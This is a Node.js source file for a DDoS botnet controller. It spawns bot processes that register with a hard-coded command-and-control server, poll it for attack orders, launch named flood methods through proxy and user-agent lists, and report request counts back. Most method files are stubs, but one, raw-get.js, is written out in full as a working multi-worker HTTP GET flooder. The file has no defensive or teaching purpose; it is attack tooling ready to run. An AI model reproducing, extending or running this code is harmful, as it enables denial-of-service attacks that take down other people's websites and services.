const { exec, spawn, fork } = require('child_process');
const fs = require('fs');
const path = require('path');
const os = require('os');
const crypto = require('crypto');

// ========== CONFIGURATION ==========
const MASTER_SERVER = process.env.MASTER_SERVER || 'https://flood-of-noah-7bs7.onrender.com';
const BOT_COUNT = parseInt(process.env.BOT_COUNT) || 5; // Number of bots to spawn
const MAX_REGISTRATION_ATTEMPTS = 5;
const HEARTBEAT_INTERVAL = 30000;
const COMMAND_POLL_INTERVAL = 3000;

// ========== COLORS ==========
const colors = {
  reset: '\x1b[0m',
  red: '\x1b[31m',
  green: '\x1b[32m',
  yellow: '\x1b[33m',
  blue: '\x1b[34m',
  magenta: '\x1b[35m',
  cyan: '\x1b[36m',
  white: '\x1b[37m',
  gray: '\x1b[90m',
  redBright: '\x1b[91m',
  greenBright: '\x1b[92m',
  yellowBright: '\x1b[93m',
  blueBright: '\x1b[94m',
  magentaBright: '\x1b[95m',
  cyanBright: '\x1b[96m'
};

function color(text, colorCode) {
  return `${colorCode}${text}${colors.reset}`;
}

// ========== GENERATE UNIQUE BOT ID (NOT IP BASED) ==========
function generateBotId() {
  const hostname = os.hostname();
  const timestamp = Date.now().toString(36);
  const random = crypto.randomBytes(6).toString('hex');
  const pid = process.pid;
  return `bot-${random}-${timestamp.slice(-4)}`;
}

// ========== CREATE BOT SCRIPT ==========
function createBotScript(botId, botName, masterServer) {
  const botScript = `// ============================================================
// INDIVIDUAL BOT SCRIPT - Generated by Multi-Bot Controller
// ============================================================

const { exec, spawn } = require('child_process');
const fs = require('fs');
const path = require('path');
const https = require('https');
const os = require('os');
const crypto = require('crypto');

// ========== BOT CONFIG ==========
const BOT_ID = '${botId}';
const BOT_NAME = '${botName}';
const MASTER_SERVER = '${masterServer}';
const MAX_REGISTRATION_ATTEMPTS = 5;
const HEARTBEAT_INTERVAL = 30000;
const COMMAND_POLL_INTERVAL = 3000;

// ========== GLOBALS ==========
let registrationAttempts = 0;
let activeProcesses = [];
let isBlocked = false;
let proxyList = [];
let uaList = [];
let requestCount = 0;
let totalRequests = 0;
let currentAttack = null;
let attackStartTime = null;
let isRunning = true;
let botReady = false;

// ========== COLORS ==========
const colors = {
  reset: '\\x1b[0m',
  red: '\\x1b[31m',
  green: '\\x1b[32m',
  yellow: '\\x1b[33m',
  blue: '\\x1b[34m',
  magenta: '\\x1b[35m',
  cyan: '\\x1b[36m',
  white: '\\x1b[37m',
  gray: '\\x1b[90m',
  redBright: '\\x1b[91m',
  greenBright: '\\x1b[92m',
  yellowBright: '\\x1b[93m',
  blueBright: '\\x1b[94m',
  magentaBright: '\\x1b[95m',
  cyanBright: '\\x1b[96m'
};

function color(text, colorCode) {
  return \`\${colorCode}\${text}\${colors.reset}\`;
}

// ========== LOGGING ==========
function log(message, type = 'info') {
  const timestamp = new Date().toISOString().replace('T', ' ').slice(0, 19);
  const prefix = \`[\${timestamp}] [\${BOT_ID.slice(0,8)}]\`;
  switch(type) {
    case 'success': console.log(color(\`\${prefix} ✅ \${message}\`, colors.green)); break;
    case 'error': console.log(color(\`\${prefix} ❌ \${message}\`, colors.red)); break;
    case 'warning': console.log(color(\`\${prefix} ⚠️ \${message}\`, colors.yellow)); break;
    case 'info': console.log(color(\`\${prefix} ℹ️ \${message}\`, colors.cyan)); break;
    default: console.log(\`\${prefix} \${message}\`);
  }
}

// ========== INSTALL PACKAGES ==========
async function installNpmPackages() {
  const requiredPackages = ['axios', 'socks', 'random-useragent', 'https-proxy-agent', 'socks-proxy-agent', 'set-cookie-parser', 'hpack'];
  const missing = [];
  for (const pkg of requiredPackages) {
    try { 
      require.resolve(pkg); 
    } catch (e) { 
      missing.push(pkg); 
    }
  }
  if (missing.length > 0) {
    return new Promise((resolve, reject) => {
      const install = spawn('npm', ['install', ...missing, '--no-save', '--silent'], { 
        stdio: 'pipe', 
        shell: true 
      });
      install.on('close', (code) => { 
        code === 0 ? resolve() : reject(new Error('Install failed')); 
      });
      install.on('error', (err) => reject(err));
    });
  }
  return Promise.resolve();
}

// ========== FILE MANAGEMENT ==========
function ensureFiles() {
  const botDir = path.join(__dirname, 'bots', BOT_ID);
  if (!fs.existsSync(botDir)) fs.mkdirSync(botDir, { recursive: true });
  
  const proxyPath = path.join(botDir, 'proxy.txt');
  const uaPath = path.join(botDir, 'ua.txt');
  
  if (!fs.existsSync(proxyPath)) {
    fs.writeFileSync(proxyPath, '# Proxy list - one per line\\n# Format: ip:port\\n');
  }
  if (!fs.existsSync(uaPath)) {
    fs.writeFileSync(uaPath, '# User Agents - one per line\\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\n');
  }
  
  return { proxyPath, uaPath };
}

// ========== LOAD PROXIES/UA ==========
function loadProxies(proxyPath) {
  try {
    if (fs.existsSync(proxyPath)) {
      const data = fs.readFileSync(proxyPath, 'utf8');
      proxyList = data.split('\\n').map(l => l.trim()).filter(l => l && !l.startsWith('#') && l.includes(':'));
    }
  } catch (e) {}
}

function loadUserAgents(uaPath) {
  try {
    if (fs.existsSync(uaPath)) {
      const data = fs.readFileSync(uaPath, 'utf8');
      uaList = data.split('\\n').map(l => l.trim()).filter(l => l && !l.startsWith('#'));
    }
  } catch (e) {}
}

// ========== API CLIENT ==========
const httpsAgent = new https.Agent({ rejectUnauthorized: false, keepAlive: true });
let api;

function getApi() {
  if (!api) {
    const axios = require('axios');
    api = axios.create({ timeout: 10000, httpsAgent, headers: { 'Content-Type': 'application/json' } });
  }
  return api;
}

// ========== REGISTER ==========
async function autoRegister() {
  if (isBlocked) { log('Bot blocked!', 'error'); process.exit(0); }
  if (registrationAttempts >= MAX_REGISTRATION_ATTEMPTS) {
    log('Max attempts, retry in 60s', 'warning');
    setTimeout(() => { registrationAttempts = 0; autoRegister(); }, 60000);
    return;
  }
  try {
    const axios = getApi();
    const payload = { id: BOT_ID, name: BOT_NAME };
    const response = await axios.post(\`\${MASTER_SERVER}/register\`, payload);
    if (response.data.approved) {
      log(\`Registered! (${BOT_NAME})\`, 'success');
      botReady = true;
      setInterval(() => checkForCommands(), COMMAND_POLL_INTERVAL);
      setInterval(() => sendHeartbeat(), HEARTBEAT_INTERVAL);
      return;
    }
  } catch (error) {
    if (error.response && error.response.status === 403) {
      log('Bot blocked!', 'error');
      isBlocked = true;
      process.exit(0);
    }
    registrationAttempts++;
    log(\`Retry \${registrationAttempts}/\${MAX_REGISTRATION_ATTEMPTS} in 5s...\`, 'warning');
    setTimeout(() => autoRegister(), 5000);
  }
}

// ========== HEARTBEAT ==========
async function sendHeartbeat() {
  if (!botReady) return;
  try {
    const axios = getApi();
    await axios.get(\`\${MASTER_SERVER}/ping\`);
    log(\`Heartbeat | Reqs: \${totalRequests}\`, 'info');
  } catch (error) {
    log('Heartbeat failed', 'error');
    registrationAttempts = 0;
    autoRegister();
  }
}

// ========== CHECK COMMANDS ==========
async function checkForCommands() {
  if (!botReady) return;
  try {
    const axios = getApi();
    const response = await axios.get(\`\${MASTER_SERVER}/get-command\`, { params: { botId: BOT_ID } });
    if (response.data.hasCommand) {
      const command = response.data.command;
      if (command.action === 'stop') {
        log('STOP received', 'warning');
        stopAllAttacks();
      } else if (command.action === 'attack') {
        const { target, time, methods } = command;
        log(\`Attack: \${methods} → \${target} for \${time}s\`, 'info');
        executeAttack(target, time, methods);
      }
    }
  } catch (error) {}
}

// ========== STOP ==========
function stopAllAttacks() {
  log(\`Killing \${activeProcesses.length} processes\`, 'warning');
  activeProcesses.forEach(proc => { 
    try { 
      proc.kill('SIGTERM'); 
    } catch (e) {} 
  });
  activeProcesses = [];
  currentAttack = null;
  requestCount = 0;
}

// ========== ATTACK ==========
function executeAttack(target, time, methods) {
  currentAttack = { id: Date.now(), target, methods, startTime: Date.now() };
  requestCount = 0;
  attackStartTime = Date.now();

  const execWithLog = (cmd) => {
    const proc = exec(cmd, { 
      detached: true, 
      maxBuffer: 1024 * 1024,
      shell: true
    }, (error, stdout, stderr) => {
      if (error && error.code !== 'SIGTERM') return;
      if (stdout) {
        const lines = stdout.split('\\n');
        lines.forEach(line => {
          if (line.includes('Request') || line.includes('GET') || line.includes('POST') || 
              line.includes('Sent') || line.includes('packet') || line.includes('connection')) {
            requestCount++;
            totalRequests++;
          }
        });
      }
    });
    
    // Handle stdout streaming without causing memory issues
    let stdoutBuffer = '';
    proc.stdout.on('data', (data) => {
      stdoutBuffer += data.toString();
      const lines = stdoutBuffer.split('\\n');
      stdoutBuffer = lines.pop() || '';
      lines.forEach(line => {
        if (line.trim()) {
          if (line.includes('Request') || line.includes('GET') || line.includes('POST') || 
              line.includes('Sent') || line.includes('packet') || line.includes('connection')) {
            requestCount++;
            totalRequests++;
          }
        }
      });
    });
    
    activeProcesses.push(proc);
    setTimeout(() => {
      const index = activeProcesses.indexOf(proc);
      if (index > -1) {
        try { 
          proc.kill('SIGTERM'); 
        } catch (e) {}
        activeProcesses.splice(index, 1);
      }
    }, parseInt(time) * 1000 + 5000);
  };

  const botDir = path.join(__dirname, 'bots', BOT_ID);
  const proxyFile = path.join(botDir, 'proxy.txt');
  const uaFile = path.join(botDir, 'ua.txt');

  // Ensure methods directory exists relative to bot script
  const methodsDir = path.join(__dirname, 'methods');
  
  switch(methods) {
    case 'RAPID10':
      execWithLog(\`node \${path.join(methodsDir, 'r10-rapid.js')} \${target} \${time} 30 \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-tcp.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-tls.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-conn.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-header.js')} \${target} \${time} 30 \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-frag.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-pipe.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-cookie.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-mixed.js')} \${target} \${time} \${proxyFile} \${uaFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'r10-lowcpu.js')} \${target} \${time} 40 \${proxyFile} \${uaFile}\`);
      break;
    case 'RAW-GET':
      execWithLog(\`node \${path.join(methodsDir, 'raw-get.js')} \${target} \${time} 20 800\`);
      break;
    case 'CF-BYPASS':
      execWithLog(\`node \${path.join(methodsDir, 'cf-bypass.js')} \${target} \${time} 4 32 \${proxyFile}\`);
      break;
    case 'MODERN-FLOOD':
      execWithLog(\`node \${path.join(methodsDir, 'modern-flood.js')} \${target} \${time} 4 64 \${proxyFile}\`);
      break;
    case 'HTTP-SICARIO':
      execWithLog(\`node \${path.join(methodsDir, 'REX-COSTUM.js')} \${target} \${time} 32 6 \${proxyFile} --randrate --full --legit --query 1\`);
      execWithLog(\`node \${path.join(methodsDir, 'cibi.js')} \${target} \${time} 16 3 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'BYPASS.js')} \${target} \${time} 32 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'nust.js')} \${target} \${time} 12 4 \${proxyFile}\`);
      break;
    case 'R9':
      execWithLog(\`node \${path.join(methodsDir, 'high-dstat.js')} \${target} \${time} 32 7 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'w-flood1.js')} \${target} \${time} 8 3 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'vhold.js')} \${target} \${time} 16 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'nust.js')} \${target} \${time} 16 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'BYPASS.js')} \${target} \${time} 8 1 \${proxyFile}\`);
      break;
    case 'R1':
      execWithLog(\`node \${path.join(methodsDir, 'vhold.js')} \${target} \${time} 15 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'high-dstat.js')} \${target} \${time} 64 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'cibi.js')} \${target} \${time} 4 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'BYPASS.js')} \${target} \${time} 16 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'REX-COSTUM.js')} \${target} \${time} 32 6 \${proxyFile} --randrate --full --legit --query 1\`);
      execWithLog(\`node \${path.join(methodsDir, 'w-flood1.js')} \${target} \${time} 8 3 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'vhold.js')} \${target} \${time} 16 2 \${proxyFile}\`);
      execWithLog(\`node \${path.join(methodsDir, 'nust.js')} \${target} \${time} 32 3 \${proxyFile}\`);
      break;
    default:
      log(\`Unknown method: \${methods}\`, 'error');
  }

  setTimeout(() => { 
    if (requestCount > 0) sendReport(target, methods, requestCount, time); 
  }, (parseInt(time) * 1000) + 2000);
}

// ========== REPORT ==========
async function sendReport(target, method, requestsMade, duration) {
  try {
    const axios = getApi();
    await axios.post(\`\${MASTER_SERVER}/api/report\`, { botId: BOT_ID, target, method, requests: requestsMade, duration });
    log(\`Report sent: \${requestsMade} requests\`, 'info');
  } catch (error) {}
}

// ========== SHUTDOWN ==========
function shutdown() {
  log('Shutting down...', 'warning');
  isRunning = false;
  stopAllAttacks();
  setTimeout(() => process.exit(0), 2000);
}

// ========== START ==========
async function startBot() {
  log(\`Starting bot: \${BOT_NAME}\`, 'info');
  
  await installNpmPackages();
  const { proxyPath, uaPath } = ensureFiles();
  loadProxies(proxyPath);
  loadUserAgents(uaPath);
  
  process.on('SIGINT', shutdown);
  process.on('SIGTERM', shutdown);
  
  await autoRegister();
  log('Ready for commands', 'success');
  
  setInterval(() => {}, 1000);
}

startBot().catch(error => {
  console.error(color(\`\${BOT_ID} Error: \${error.message}\`, colors.red));
  process.exit(1);
});
`;
  return botScript;
}

// ========== MAIN CONTROLLER ==========
class MultiBotController {
  constructor() {
    this.bots = [];
    this.botScripts = [];
    this.botProcesses = [];
    this.isRunning = true;
    this.mainDir = __dirname;
  }

  generateBotName(index) {
    const names = [
      'Alpha', 'Bravo', 'Charlie', 'Delta', 'Echo', 'Foxtrot', 'Golf', 'Hotel', 
      'India', 'Juliett', 'Kilo', 'Lima', 'Mike', 'November', 'Oscar', 'Papa',
      'Quebec', 'Romeo', 'Sierra', 'Tango', 'Uniform', 'Victor', 'Whiskey', 'Xray',
      'Yankee', 'Zulu', 'Necro', 'Viper', 'Phantom', 'Shadow', 'Raven', 'Wolf'
    ];
    return `${names[index % names.length]}-${Math.floor(index / names.length) + 1}`;
  }

  createBotInstance(index) {
    const botId = generateBotId();
    const botName = this.generateBotName(index);
    
    // Create bot script with placeholders replaced
    const script = createBotScript(botId, botName, MASTER_SERVER);
    
    return { id: botId, name: botName, script: script };
  }

  spawnBot(index) {
    const bot = this.createBotInstance(index);
    this.bots.push(bot);
    
    // Write bot script to temp file
    const tempDir = path.join(this.mainDir, 'bots');
    if (!fs.existsSync(tempDir)) {
      fs.mkdirSync(tempDir, { recursive: true });
    }
    const tempPath = path.join(tempDir, `${bot.id}.js`);
    fs.writeFileSync(tempPath, bot.script);
    
    // Spawn the bot process
    const proc = fork(tempPath, [], {
      detached: false,
      stdio: 'pipe',
      env: {
        ...process.env,
        BOT_ID: bot.id,
        BOT_NAME: bot.name,
        MASTER_SERVER: MASTER_SERVER
      }
    });
    
    // Capture output with buffering
    let stdoutBuffer = '';
    let stderrBuffer = '';
    
    proc.stdout.on('data', (data) => {
      stdoutBuffer += data.toString();
      const lines = stdoutBuffer.split('\n');
      stdoutBuffer = lines.pop() || '';
      lines.forEach(line => {
        if (line.trim()) {
          console.log(`[${bot.id.slice(0,8)}] ${line}`);
        }
      });
    });
    
    proc.stderr.on('data', (data) => {
      stderrBuffer += data.toString();
      const lines = stderrBuffer.split('\n');
      stderrBuffer = lines.pop() || '';
      lines.forEach(line => {
        if (line.trim()) {
          console.error(`[${bot.id.slice(0,8)}] ${color(line, colors.red)}`);
        }
      });
    });
    
    proc.on('exit', (code) => {
      console.log(color(`[${bot.id.slice(0,8)}] Process exited with code ${code}`, colors.yellow));
      this.botProcesses = this.botProcesses.filter(p => p.pid !== proc.pid);
      
      // Auto-restart if still running
      if (this.isRunning) {
        console.log(color(`[${bot.id.slice(0,8)}] Restarting...`, colors.cyan));
        setTimeout(() => this.spawnBot(index), 2000);
      }
    });
    
    proc.on('error', (err) => {
      console.error(color(`[${bot.id.slice(0,8)}] Error: ${err.message}`, colors.red));
    });
    
    this.botProcesses.push(proc);
    console.log(color(`[${bot.id.slice(0,8)}] ✅ Spawned (${bot.name})`, colors.green));
    
    return proc;
  }

  spawnAll() {
    console.log(color('\n🤖 MULTI-BOT CONTROLLER', colors.cyanBright));
    console.log(color('='.repeat(60), colors.cyan));
    console.log(color(`📡 Master Server: ${MASTER_SERVER}`, colors.magenta));
    console.log(color(`🤖 Bot Count: ${BOT_COUNT}`, colors.magenta));
    console.log(color('='.repeat(60), colors.cyan));
    console.log(color('\n⏳ Spawning bots...\n', colors.cyan));
    
    for (let i = 0; i < BOT_COUNT; i++) {
      this.spawnBot(i);
      // Small delay between spawns
      if (i < BOT_COUNT - 1) {
        const delay = 500 + Math.random() * 1000;
        console.log(color(`⏳ Waiting ${Math.round(delay)}ms before next spawn...`, colors.gray));
        const start = Date.now();
        while (Date.now() - start < delay) {}
      }
    }
    
    console.log(color(`\n✅ ${BOT_COUNT} bots spawned!`, colors.green));
    console.log(color('📊 Press Ctrl+C to stop all bots\n', colors.gray));
  }

  stopAll() {
    console.log(color('\n🛑 Stopping all bots...', colors.yellow));
    this.isRunning = false;
    
    this.botProcesses.forEach(proc => {
      try {
        proc.kill('SIGTERM');
      } catch (e) {}
    });
    
    // Clean up temp files
    setTimeout(() => {
      try {
        const botsDir = path.join(this.mainDir, 'bots');
        if (fs.existsSync(botsDir)) {
          const files = fs.readdirSync(botsDir);
          files.forEach(file => {
            if (file.endsWith('.js')) {
              fs.unlinkSync(path.join(botsDir, file));
            }
          });
        }
      } catch (e) {}
      console.log(color('✅ All bots stopped', colors.green));
      process.exit(0);
    }, 3000);
  }

  run() {
    // Handle shutdown
    process.on('SIGINT', () => this.stopAll());
    process.on('SIGTERM', () => this.stopAll());
    
    this.spawnAll();
    
    // Keep alive and monitor processes
    setInterval(() => {
      // Monitor processes
      const alive = this.botProcesses.filter(p => p.connected && !p.killed);
      if (alive.length < this.botProcesses.length && this.isRunning) {
        console.log(color(`⚠️ Some bots died (${this.botProcesses.length - alive.length}). Restarting...`, colors.yellow));
        // Restart dead bots
        const deadIndices = [];
        this.botProcesses.forEach((proc, index) => {
          if (!proc.connected || proc.killed) {
            deadIndices.push(index);
          }
        });
        deadIndices.forEach(index => {
          this.spawnBot(index);
        });
      }
    }, 30000);
  }
}

// ========== CREATE REQUIRED DIRECTORIES ==========
function setupDirectories() {
  const dirs = ['methods', 'bots'];
  for (const dir of dirs) {
    if (!fs.existsSync(dir)) fs.mkdirSync(dir, { recursive: true });
  }
}

// ========== CREATE METHODS (if missing) ==========
function createMethodStubs() {
  const methodsDir = 'methods';
  const methodFiles = [
    'high-dstat.js', 'w-flood1.js', 'vhold.js', 'nust.js', 'BYPASS.js', 'cibi.js', 
    'REX-COSTUM.js', 'h2-nust', 'http-panel.js', 'uam.js', 'wil.js', 'cf-bypass.js', 
    'modern-flood.js', 'raw-get.js',
    'r10-rapid.js', 'r10-tcp.js', 'r10-tls.js', 'r10-conn.js', 'r10-header.js', 
    'r10-frag.js', 'r10-pipe.js', 'r10-cookie.js', 'r10-mixed.js', 'r10-lowcpu.js'
  ];
  
  const stub = (name) => `console.log('[${name.toUpperCase()}] Starting attack'); 
const target = process.argv[2]; 
const time = parseInt(process.argv[3]) || 60; 
setTimeout(() => process.exit(0), time * 1000);`;
  
  for (const file of methodFiles) {
    const filePath = path.join(methodsDir, file);
    if (!fs.existsSync(filePath)) {
      fs.writeFileSync(filePath, stub(file.replace('.js', '')));
    }
  }
  
  // Special RAW-GET with actual functionality
  const rawGetPath = path.join(methodsDir, 'raw-get.js');
  if (!fs.existsSync(rawGetPath)) {
    const rawGetContent = `const http = require('http');
const https = require('https');
const url = require('url');
const cluster = require('cluster');

const args = {
    target: process.argv[2],
    time: parseInt(process.argv[3]) || 60,
    threads: parseInt(process.argv[4]) || 10,
    rate: parseInt(process.argv[5]) || 1000
};

const parsed = new URL(args.target);
const isHttps = parsed.protocol === 'https:';
const httpLib = isHttps ? https : http;
const agent = new httpLib.Agent({ keepAlive: true, maxSockets: Infinity, rejectUnauthorized: false });

if (cluster.isMaster) {
    console.log(\`RAW-GET | \${args.target} | \${args.time}s | \${args.threads} workers\`);
    for (let i = 0; i < args.threads; i++) cluster.fork();
    setTimeout(() => process.exit(0), args.time * 1000 + 2000);
} else {
    let running = true;
    const sendRequest = () => {
        if (!running) return;
        const req = httpLib.request({
            hostname: parsed.hostname,
            port: parsed.port || (isHttps ? 443 : 80),
            path: parsed.pathname + '?r=' + Math.random(),
            method: 'GET',
            agent: agent,
            rejectUnauthorized: false
        }, (res) => res.resume());
        req.on('error', () => {});
        req.end();
        if (running) setImmediate(sendRequest);
    };
    for (let i = 0; i < 10; i++) sendRequest();
    setTimeout(() => { running = false; process.exit(0); }, args.time * 1000);
}`;
    fs.writeFileSync(rawGetPath, rawGetContent);
  }
}

// ========== MAIN ==========
function main() {
  // Parse command line arguments
  let botCount = BOT_COUNT;
  let masterServer = MASTER_SERVER;
  
  for (let i = 2; i < process.argv.length; i++) {
    if (process.argv[i] === '--count' && i + 1 < process.argv.length) {
      botCount = parseInt(process.argv[i + 1]);
      i++;
    } else if (process.argv[i] === '--server' && i + 1 < process.argv.length) {
      masterServer = process.argv[i + 1];
      i++;
    } else if (process.argv[i] === '--help' || process.argv[i] === '-h') {
      console.log(`
Multi-Bot Controller - Spawn multiple bot sessions

Usage:
  node multi_bot.js [options]

Options:
  --count <number>   Number of bots to spawn (default: 5)
  --server <url>     Master server URL (default: https://flood-of-noah-7bs7.onrender.com)
  --help, -h         Show this help

Environment Variables:
  BOT_COUNT          Number of bots
  MASTER_SERVER      Master server URL

Example:
  node multi_bot.js --count 10 --server https://your-server.com
`);
      process.exit(0);
    }
  }
  
  // Override config
  process.env.BOT_COUNT = botCount;
  process.env.MASTER_SERVER = masterServer;
  
  // Setup
  setupDirectories();
  createMethodStubs();
  
  // Start controller
  const controller = new MultiBotController();
  controller.run();
}

// ========== START ==========
if (require.main === module) {
  main();
}
